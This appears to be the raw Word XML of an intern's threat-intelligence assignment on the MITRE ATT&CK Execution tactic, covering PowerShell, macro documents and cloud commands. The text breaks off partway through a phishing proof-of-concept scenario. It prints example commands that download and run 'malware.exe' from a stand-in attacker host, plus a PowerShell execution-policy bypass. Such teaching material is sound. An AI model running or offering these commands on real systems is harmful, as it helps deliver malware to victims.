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6BE0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="195" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>TASK :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">-  Threat Intelligence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC68C9" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="195" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280069B0" w14:textId="32E33B90" w:rsidR="00BD7DF8" w:rsidRPr="00BD7DF8" w:rsidRDefault="00000000" w:rsidP="00BD7DF8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="193"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name: - </w:t>
      </w:r>
      <w:r w:rsidR="00BD7DF8">
        <w:t>Megha Banne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                         Intern </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>I’d :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00BD7DF8">
        <w:t>220</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB73073" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="121" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA7967" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tactic Chosen:  Execution (TA0002) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA04527" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE Link:</w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:b/>
            <w:u w:val="single" w:color="0563C1"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/tactics/TA0002/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:b/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1289AFC1" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472836A3" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Description of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tactic:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC4D58B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Execution tactic involves techniques that result in running malicious code on a victim's system. After gaining access, attackers must execute code to achieve objectives like persistence, data theft, or lateral movement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56411687" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution can be triggered by user actions (e.g., opening a malicious file) or automatically via scripts, tools, or cloud services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A1B94" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="219" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0AAC6" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="46A4FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective of This PoC: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303435A3" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To demonstrate how attackers use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>three execution techniques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to compromise systems using: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA8189" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PowerShell (T1059) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E483E02" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Macro-enabled documents (T1204.002) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647FB960" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloud administration commands (T1651) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F79263" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="15"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Techniques Selected (with MITRE IDs):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2F5496"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB792C4" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="161"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Technique </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238648E3" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2935"/>
          <w:tab w:val="center" w:pos="6957"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Technique Name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MITRE Link </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A70494" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="243" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6792FC" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1342" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Command and Scripting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E92B5" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="6727"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1059 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0563C1"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/techniques/T1059/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:sz w:val="2"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19CEF655" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="233"/>
        <w:ind w:left="1342" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CCE6C8" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1342" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">User Execution: Malicious File </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE6092" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="6956"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">T1204.002 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0563C1"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/techniques/T1204/002/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:sz w:val="2"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="608B99AD" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="249"/>
        <w:ind w:left="1342" w:right="346"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Macro) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66937D7A" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5094"/>
        </w:tabs>
        <w:spacing w:after="267" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">T1651 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Cloud Administration Command </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0563C1"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/techniques/T1651/</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:sz w:val="2"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4341A649" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489506C0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="370"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique 1: T1059 – Command and Scripting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Interpreter(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830D17D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E164CE" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E4F5C0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attackers use PowerShell — a powerful Windows command-line tool — to execute malicious code. It's commonly used in fileless attacks where scripts run directly in memory, avoiding traditional antivirus detection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B48218" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="61" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EFA72B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="46A4FB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Purpose: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECC4EE" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PowerShell gives attackers a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>silent and flexible way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run commands, download malware, and gain control over the victim’s system — often without needing to install anything. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BD406" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F11DACD" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B039E2D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="730"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Real-world Use: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D7E490" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="730" w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT29 (Cozy Bear), a Russian state-sponsored group, used PowerShell to execute commands during cyber-espionage attacks on U.S. government agencies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09683558" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD319F3" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26978D32" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="28" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F106BD7" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405E52E" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Commands / Scripts: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135F9E5" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="469"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Malicious PowerShell commands typically look like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0740D" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="94" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830D07F"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4911"/>
        </w:tabs>
        <w:spacing w:after="232" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Invoke-WebRequest http://attacker.com/malware.exe -OutFile malware.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB58D6"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0" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Start-Process malware.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554BF0E1"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184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64D5E2" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E1965" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="184" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Or downloaded via phishing: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0E673"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94" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B258A71"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5157"/>
        </w:tabs>
        <w:spacing w:after="489" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>powershell.exe -ExecutionPolicy Bypass -File payload.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3CED06" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="193" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DEAC7" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC Scenario: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404A7D7" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker uploads a malicious script named payload.ps1 to their server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7AAE4" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A phishing email is sent to the victim with a link to the script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6853A0C0" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="469" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim clicks the link — which triggers this command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4AE13B" w14:textId="77777777" w:rsidR="007D1E15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="131" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF7B76"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4957"/>
        </w:tabs>
